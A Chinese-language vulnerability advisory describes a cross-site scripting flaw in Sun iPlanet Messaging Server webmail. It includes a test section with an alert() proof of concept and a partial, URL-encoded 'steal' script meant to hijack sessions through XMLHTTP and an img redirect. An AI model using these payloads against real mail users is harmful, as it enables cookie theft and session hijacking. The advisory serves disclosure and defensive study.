安全研究

安全漏洞
iPlanet Messaging Server HTML附件跨站脚本执行漏洞

发布日期:2003-05-27
更新日期:2003-06-09

受影响系统:
Sun iPlanet Messaging Server 5.2
Sun iPlanet Messaging Server 5.1
Sun iPlanet Messaging Server 5.0
描述:
BUGTRAQ  ID: 7704

iPlanet Messaging Server是一款智能Web服务的开发、集成以及部署服务的完全开放体系架构的关键组件。

iPlanet Messaging Server的WEBMAIL在处理HTML附件时缺少充分的过滤,远程攻击者可以利用这个漏洞进行跨站脚本攻击,可以窃取用户基于验证的Cookie等敏感信息。

攻击者可以夹带HTML形式的附件发给目标用户,由于iPlanet Messaging不充分过滤邮件中的字符,可导致用户打开WEB邮件时恶意脚本在浏览器执行,借此可窃取Cookie信息,或者劫持会话等攻击。

<*来源:KernelPanikLabs (overclocking_a_la_abuela@hotmail.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=105405550921888&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html>
<script>alert(document.URL)</script>
</html>

下面的脚本提供使用WEB重定向间接会话劫持的演示:

function%20steal(){var%20xmlHttp%20=%20new%20ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("GET","<URL_to_spoof>",false);xmlHttp.send();xmlDoc=xmlHttp.responseText;

"xmldoc"可以使用"img src"重定向。

建议:
厂商补丁:

Sun
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://sunsolve.sun.com/security

浏览次数:2771
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障